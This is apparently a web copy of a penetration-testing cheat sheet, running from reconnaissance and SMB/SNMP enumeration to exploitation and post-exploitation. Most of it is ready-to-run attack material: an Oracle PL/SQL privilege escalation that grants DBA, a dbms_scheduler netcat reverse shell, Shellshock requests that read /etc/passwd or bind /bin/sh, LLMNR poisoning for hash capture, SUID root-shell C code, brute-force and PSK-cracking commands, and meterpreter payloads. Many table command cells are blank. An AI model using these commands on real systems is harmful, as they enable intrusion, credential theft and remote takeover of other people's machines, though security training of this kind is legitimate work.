HigHorn's cheat sheet
Thx to Arr0way for his great work at HighIn.Coffee.
Pre-engagementNetwork ConfigurationSet IP Address
ifconfig eth0 xxx.xxx.xxx.xxx/24
ipcalc xxx.xxx.xxx.xxx/24
ipcalc xxx.xxx.xxx.xxx 255.255.255.0
OSINT Passive Information GatheringDNSWHOIS enumeration
whois domain-name-here.com
dig a domain-name-here.com @nameserver
dig mx domain-name-here.com @nameserver
Perform Zone Transfer with DIG
dig axfr domain-name-here.com @nameserver
COMMAND | DESCRIPTION |
---|---|
| Windows DNS zone transfer |
| Linux DNS zone transfer |
Use Simply Email to enumerate all the online places (github, target site etc), it works better if you use proxies or set long throttle times so google doesn’t think you’re a robot and make you fill out a Captcha.
git clone https://github.com/killswitch-GUI/SimplyEmail.git
./SimplyEmail.py -all -e TARGET-DOMAIN
Simply Email can verify the discovered email addresss after gathering.
Semi Active Information GatheringBasic Finger Printing
Manual finger printing / banner grabbing.
COMMAND | DESCRIPTION |
---|---|
| Basic versioning / finger printing via displayed banner |
nc TARGET-IP 80
GET / HTTP/1.1
Host: TARGET-IP
User-Agent: Mozilla/5.0
Referrer: meh-domain
<enter>
Active Information GatheringDNS BruteforceDNSRecon
DNS Enumeration Kali - DNSRecon
root:~# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
For more commands, see the Nmap cheat sheet (link in the menu on the right).
Basic Nmap Commands:
COMMAND | DESCRIPTION |
---|---|
| Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services |
| As above but scans all TCP ports (takes a lot longer) |
| As above but scans all TCP ports and UDP scan (takes even longer) |
| Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may cause knockover |
| Search nmap scripts for keywords |
I’ve had a few people mention about T4 scans, apply common sense here. Don’t use T4 commands on external pen tests (when using an Internet connection), you’re probably better off using a T2 with a TCP connect scan. A T4 scan would likely be better suited for an internal pen test, over low latency links with plenty of bandwidth. But it all depends on the target devices, embeded devices are going to struggle if you T4 / T5 them and give inconclusive results. As a general rule of thumb, scan as slowly as you can, or do a fast scan for the top 1000 so you can start pen testing then kick off a slower scan.
nmap -sU TARGET
git clone https://github.com/portcullislabs/udp-proto-scanner.git
Scan a file of IP addresses for all services:
./udp-protocol-scanner.pl -f ip.txt
Scan for a specific UDP service:
udp-proto-scanner.pl -p ntp -f ips.txt
Other methods of host discovery, that don’t use nmap…
COMMAND | DESCRIPTION |
---|---|
| Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site |
Penetration testing tools that spefically identify and / or enumerate network services:
SAMB / SMB / Windows Domain EnumerationSamba EnumerationSMB Enumeration Tools
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
Also see, nbtscan cheat sheet (right hand menu).
COMMAND | DESCRIPTION |
---|---|
| Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain |
| Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing |
smbclient -L //192.168.1.100
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254
python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX
RID Cycling:
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
Metasploit module for RID cycling:
use auxiliary/scanner/smb/smb_lookupsid
Windows:
net use \\TARGET\IPC$ "" /u:""
Linux:
smbclient -L //192.168.99.131
Install on Kali rolling:
apt-get install nbtscan-unixwiz
nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan
Steal credentials off the network.
Metasploit LLMNR / NetBIOS requests
Spoof / poison LLMNR / NetBIOS requests:
auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
Capture the hashes:
auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm
You’ll end up with NTLMv2 hash, use john or hashcat to crack it.
Alternatively you can use responder.
git clone https://github.com/SpiderLabs/Responder.git
python Responder.py -i local-ip -I eth0
Run Responder.py for the whole engagement
Run Responder.py for the length of the engagement while you're working on other attack vectors.
A number of SNMP enumeration tools.
Fix SNMP output values so they are human readable:
apt-get install snmp-mibs-downloader download-mibs
echo "" > /etc/snmp/snmp.conf
COMMAND | DESCRIPTION |
---|---|
| SNMP enumeration |
Idenitfy SNMPv3 servers with nmap:
nmap -sV -p 161 --script=snmp-info TARGET-SUBNET
Rory McCune’s snmpwalk wrapper script helps automate the username enumeration process for SNMPv3:
apt-get install snmp snmp-mibs-downloader
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
Use Metasploits Wordlist
Metasploit's wordlist (KALI path below) has common credentials for v1 & 2 of SNMP, for newer credentials check out Daniel Miessler's SecLists project on GitHub (not the mailing list!).
/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
This is legacy, included for completeness.
nmap -A will perform all the rservices enumeration listed below, this section has been added for completeness or manual confirmation:
RSH EnumerationRSH Run Commands
rsh <target> <command>
auxiliary/scanner/rservices/rsh_login
rusers -al 192.168.2.1
rlogin -l <user> <target>
e.g rlogin -l root TARGET-SUBNET/24
finger @TARGET-IP
finger batman@TARGET-IP
Solaris bug that shows all logged in users:
finger 0@host
SunOS: RPC services allow user enum:
$ rusers # users logged onto LAN
finger 'a b c d e f g h'@sunhost
Use nmap to identify machines running rwhod (513 UDP)
Test all the things on a single host and output to a .html file:
./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html
Install OpenVAS 8 on Kali Rolling:
apt-get update
apt-get dist-upgrade -y
apt-get install openvas
openvas-setup
Verify openvas is running using:
netstat -tulpn
Login at https://127.0.0.1:9392 - credentials are generated during openvas-setup.
Attacking database servers exposed on the network.
Install oscanner:
apt-get install oscanner
Run oscanner:
oscanner -s 192.168.1.200 -P 1521
Fingerprint Oracle TNS Version
Install tnscmd10g:
apt-get install tnscmd10g
Fingerprint oracle tns:
tnscmd10g version -h TARGET
nmap --script=oracle-tns-version
Brute force oracle user accounts
Identify default Oracle accounts:
nmap --script=oracle-sid-brute
nmap --script=oracle-brute
Run nmap scripts against Oracle TNS:
nmap -p 1521 -A TARGET
Requirements:
- Oracle needs to be exposed on the network
- A default account is in use like scott
Quick overview of how this works:
- Create the function
- Create an index on table SYS.DUAL
- The index we just created executes our function SCOTT.DBA_X
- The function will be executed by SYS user (as that’s the user that owns the table).
- Create an account with DBA priveleges
In the example below the user SCOTT is used but this should be possible with another default Oracle account.
Identify default accounts within oracle db using NMAP NSE scripts:
nmap --script=oracle-sid-brute
nmap --script=oracle-brute
Login using the identified weak account (assuming you find one).
How to identify the current privilege level for an oracle user:
SQL> select * from session_privs;
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar deterministic authid
curren_user is
pragma autonomous_transaction;
begin
execute immediate 'grant dba to user1 identified by pass1';
commit;
return 'FOO';
end;
Oracle priv esc and obtain DBA access:
Run netcat: netcat -nvlp 443
code>
SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));
Run the exploit with a select query:
SQL> Select * from session_privs;
You should have a DBA user with creds user1 and pass1.
Verify you have DBA privileges by re-running the first command again.
drop index exploit_1337;
begin
dbms_scheduler.create_job( job_name => 'MEH1337',job_type =>
'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,start_date =>
SYSTIMESTAMP,enabled => FALSE,auto_drop => TRUE);
dbms_scheduler.set_job_argument_value('rev_shell', 1, 'TARGET-IP');
dbms_scheduler.set_job_argument_value('rev_shell', 2, '443');
dbms_scheduler.set_job_argument_value('rev_shell', 3, '-e');
dbms_scheduler.set_job_argument_value('rev_shell', 4, '/bin/bash');
dbms_scheduler.enable('rev_shell');
end;
Enumeration / Discovery:
Nmap:
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Metasploit:
msf > use auxiliary/scanner/mssql/mssql_ping
Use MS SQL Servers Browse For More
Try using "Browse for More" via MS SQL Server Management Studio
msf > use auxiliary/admin/mssql/mssql_enum
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PuTTY Link tunnel
Forward remote port to local address:
plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP
ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip
Add socks4 127.0.0.1 1010 in /etc/proxychains.conf
SSH pivoting from one network to another:
ssh -D 127.0.0.1:1010 -p 22 user1@ip-address-1
Add socks4 127.0.0.1 1010 in /etc/proxychains.conf
proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2
Add socks4 127.0.0.1 1011 in /etc/proxychains.conf
Meterpreter PivotingTTL Finger Printing
OPERATING SYSTEM | TTL SIZE |
---|---|
Windows |
|
Linux |
|
Solaris |
|
Cisco / Network |
|
E.g Class A,B,C (depreciated)
CLASS | IP ADDRESS RANGE |
---|---|
Class A IP Address Range |
|
Class B IP Address Range |
|
Class C IP Address Range |
|
Class D IP Address Range |
|
Class E IP Address Range |
|
CLASS | RANGE |
---|---|
Class A Private Address Range |
|
Class B Private Address Range |
|
Class C Private Address Range |
|
|
Subnet cheat sheet, not really realted to pen testing but a useful reference.
CIDR | DECIMAL MASK | NUMBER OF HOSTS |
---|---|---|
/31 |
|
|
/30 |
|
|
/29 |
|
|
/28 |
|
|
/27 |
|
|
/26 |
|
|
/25 |
|
|
/24 |
|
|
/23 |
|
|
/22 |
|
|
/21 |
|
|
/20 |
|
|
/19 |
|
|
/18 |
|
|
/17 |
|
|
/16 |
|
|
/15 |
|
|
/14 |
|
|
/13 |
|
|
/12 |
|
|
/11 |
|
|
/10 |
|
|
/9 |
|
|
/8 |
|
|
Using NCCGroups VLAN wrapper script for Yersina simplifies the process.
git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh
Identify VPN servers:
./udp-protocol-scanner.pl -p ike TARGET(s)
Scan a range for VPN servers:
./udp-protocol-scanner.pl -p ike -f ip.txt
Use IKEForce to enumerate or dictionary attack VPN servers.
Install:
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
Perform IKE VPN enumeration with IKEForce:
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
Bruteforce IKE VPN using IKEForce:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
IKE Aggressive Mode PSK Cracking
- Identify VPN Servers
- Enumerate with IKEForce to obtain the group ID
- Use ike-scan to capture the PSK hash from the IKE endpoint
- Use psk-crack to crack the hash
./udp-protocol-scanner.pl -p ike SUBNET/24
Step 2: Enumerate group name with IKEForce
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
Step 3: Use ike-scan to capture the PSK hash
ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP
Step 4: Use psk-crack to crack the PSK hash
psk-crack hash-file.txt
Some more advanced psk-crack options below:
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
Identifying PPTP, it listens on TCP: 1723
nmap –Pn -sV -p 1723 TARGET(S)
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
Tunneling data over DNS to bypass firewalls.
dnscat2 supports “download” and “upload” commands for getting files (data and programs) to and from the target machine.
Installtion:
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
Run dnscat2:
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422
Target Machine:
https://downloads.skullsecurity.org/dnscat2/ https://github.com/lukebaggett/dnscat2-powershell/
dnscat --host <dnscat server_ip>
Find exploits for enumerated hosts / services.
COMMAND | DESCRIPTION |
---|---|
| Search exploit-db for exploit, in this example windows 2003 + local esc |
| Use google to search exploit-db.com for exploits |
| Search metasploit modules using grep - msf search sucks a bit |
Install local copy of exploit-db:
searchsploit –u
searchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local
Compiling Windows Exploits on Kali
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)
Exploiting Common VulnerabilitiesExploiting Shellshock
A tool to find and exploit servers vulnerable to Shellshock:
git clone https://github.com/nccgroup/shocker
./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
nc -l -p 443
Python local web server command, handy for serving up shells and exploits on an attacking machine.
COMMAND | DESCRIPTION |
---|---|
| Run a basic http server, great for serving up shells etc |
| Run a basic Python3 http server, great for serving up shells etc |
| Run a ruby webrick basic http server |
| Run a basic PHP http server |
How to mount NFS / CIFS, Windows and Linux file shares.
COMMAND | DESCRIPTION |
---|---|
| Mount NFS share to |
| Mount Windows CIFS / SMB share on Linux at |
| Mount a Windows share on Windows from the command line |
| Install smb4k on Kali, useful Linux GUI for browsing SMB shares |
COMMAND | DESCRIPTION |
---|---|
| Perform a nikto scan against target |
| Configure via GUI, CLI input doesn't work most of the time |
COMMAND | DESCRIPTION |
---|---|
| tcpdump for port 80 on interface eth0, outputs to output.pcap |
Some techniques used to remotely enumerate users on a target system.
COMMAND | DESCRIPTION |
---|---|
| Enumerate users from SMB |
| RID cycle SMB / enumerate users from SMB |
COMMAND | DESCRIPTION |
---|---|
| Enmerate users from SNMP |
| Enmerate users from SNMP |
| Search for SNMP servers with nmap, grepable output |
COMMAND | DESCRIPTION |
---|---|
| Kali word lists |
COMMAND | DESCRIPTION |
---|---|
| Hydra FTP brute force |
COMMAND | DESCRIPTION |
---|---|
| Hydra POP3 brute force |
COMMAND | DESCRIPTION |
---|---|
| Hydra SMTP brute force |
Use -t
to limit concurrent connections, example: -t 15
Password cracking penetration testing tools.
COMMAND | DESCRIPTION |
---|---|
| JTR password cracking |
| JTR forced descrypt cracking with wordlist |
| JTR forced descrypt brute force cracking |
See Windows Penetration Testing Commands.
Linux Penetration Testing Commands
See Linux Commands Cheat Sheet (right hand menu) for a list of Linux Penetration testing commands, useful for local system enumeration.
Some notes on compiling exploits.
Identifying if C code is for Windows or Linux
C #includes will indicate which OS should be used to build the exploit.
COMMAND | DESCRIPTION |
---|---|
| Windows exploit code |
| Linux exploit code |
Compile exploit gcc.
COMMAND | DESCRIPTION |
---|---|
| Basic GCC compile |
Handy for cross compiling 32 bit binaries on 64 bit attacking machines.
COMMAND | DESCRIPTION |
---|---|
| Cross compile 32 bit binary on 64 bit Linux |
Build / compile windows exploits on Linux, resulting in a .exe file.
COMMAND | DESCRIPTION |
---|---|
| Compile windows .exe on Linux |
Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.
below are some quick copy and pate examples for various shells:
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
See Reverse Shell Cheat Sheet for a list of useful Reverse Shells.
Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su
from reverse shells.
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
exec "/bin/sh";
perl —e 'exec "/bin/sh";'
exec "/bin/sh"
os.execute('/bin/sh')
Run shell commands from vi:
:!bash
!sh
A basic metasploit cheat sheet that I have found handy for reference.
Basic Metasploit commands, useful for reference, for pivoting see - Meterpreter Pivoting techniques.
Meterpreter PayloadsWindows reverse meterpreter payload
COMMAND | DESCRIPTION |
---|---|
| Windows reverse tcp payload |
COMMAND | DESCRIPTION |
---|---|
| Meterpreter Windows VNC Payload |
COMMAND | DESCRIPTION |
---|---|
| Meterpreter Linux Reverse Payload |
Useful meterpreter commands.
COMMAND | DESCRIPTION |
---|---|
| Meterpreter upload file to Windows target |
| Meterpreter download file from Windows target |
| Meterpreter download file from Windows target |
| Meterpreter run .exe on target - handy for executing uploaded exploits |
| Creates new channel with cmd shell |
| Meterpreter show processes |
| Meterpreter get shell on the target |
| Meterpreter attempts priviledge escalation the target |
| Meterpreter attempts to dump the hashes on the target |
| Meterpreter create port forward to target machine |
| Meterpreter delete port forward |
Top metasploit modules.
Remote Windows Metasploit Modules (exploits)
COMMAND | DESCRIPTION |
---|---|
| MS08_067 Windows 2k, XP, 2003 Remote Exploit |
| MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit |
| MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit |
COMMAND | DESCRIPTION |
---|---|
| Bypass UAC on Windows 7 + Set target + arch, x86/64 |
COMMAND | DESCRIPTION |
---|---|
| Metasploit HTTP directory scanner |
| Metasploit JBOSS vulnerability scanner |
| Metasploit MSSQL Credential Scanner |
| Metasploit MSSQL Version Scanner |
| Metasploit Oracle Login Module |
COMMAND | DESCRIPTION |
---|---|
| Metasploit powershell payload delivery module |
| Metasploit upload and run powershell script through a session |
| Metasploit JBOSS deploy |
| Metasploit MSSQL payload |
Windows Metasploit Modules for privilege escalation.
COMMAND | DESCRIPTION |
---|---|
| Metasploit show privileges of current user |
| Metasploit grab GPP saved passwords |
| Metasplit load Mimikatz |
| Idenitfy other machines that the supplied domain user has administrative access to |
| Automated dumping of sam file, tries to esc privileges etc |
Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.
ASCII | CHARACTER |
---|---|
| Null Byte |
| BS |
| TAB |
| LF |
| CR |
| ESC |
| SPC |
| ! |
| " |
| # |
| $ |
| % |
| & |
| ` |
| ( |
| ) |
| * |
| + |
| , |
| - |
| . |
| / |
| 0 |
| 1 |
| 2 |
| 3 |
| 4 |
| 5 |
| 6 |
| 7 |
| 8 |
| 9 |
| : |
| ; |
| < |
| = |
| > |
| ? |
| @ |
| A |
| B |
| C |
| D |
| E |
| F |
| G |
| H |
| I |
| J |
| K |
| L |
| M |
| N |
| O |
| P |
| Q |
| R |
| S |
| T |
| U |
| V |
| W |
| X |
| Y |
| Z |
| [ |
| \ |
| ] |
| ^ |
| _ |
| ` |
| a |
| b |
| c |
| d |
| e |
| f |
| g |
| h |
| i |
| j |
| k |
| l |
| m |
| n |
| o |
| p |
| q |
| r |
| s |
| t |
| u |
| v |
| w |
| x |
| y |
| z |
A collection of useful Cisco IOS commands.
COMMAND | DESCRIPTION |
---|---|
| Enters enable mode |
| Short for, configure terminal |
| Configure FastEthernet 0/0 |
| Add ip to fa0/0 |
| Add ip to fa0/0 |
| Configure vty line |
| Cisco set telnet password |
| Set telnet password |
| Show running config loaded in memory |
| Show sartup config |
| show cisco IOS version |
| display open sessions |
| Show network interfaces |
| Show detailed interface info |
| Show routes |
| Show access lists |
| Show available files |
| File information |
| SHow deleted files |
| No limit on terminal output |
| Copys running config to tftp server |
| Copy startup-config to running-config |
HASH | SIZE |
---|---|
MD5 Hash Length |
|
SHA-1 Hash Length |
|
SHA-256 Hash Length |
|
SHA-512 Hash Length |
|
Likely just use hash-identifier for this but here are some example hashes:
HASH | EXAMPLE |
---|---|
MD5 Hash Example |
|
MD5 $PASS:$SALT Example |
|
MD5 $SALT:$PASS |
|
SHA1 Hash Example |
|
SHA1 $PASS:$SALT |
|
SHA1 $SALT:$PASS |
|
SHA-256 |
|
SHA-256 $PASS:$SALT |
|
SHA-256 $SALT:$PASS |
|
SHA-512 |
|
SHA-512 $PASS:$SALT |
|
SHA-512 $SALT:$PASS |
|
NTLM Hash Example |
|
A mini SQLMap cheat sheet:
COMMAND | DESCRIPTION |
---|---|
| Automated sqlmap scan |
| Targeted sqlmap scan |
| Scan url for union + error based injection with mysql backend |
| sqlmap check form for injection |
| sqlmap dump and crack hashes for table users on database-name. |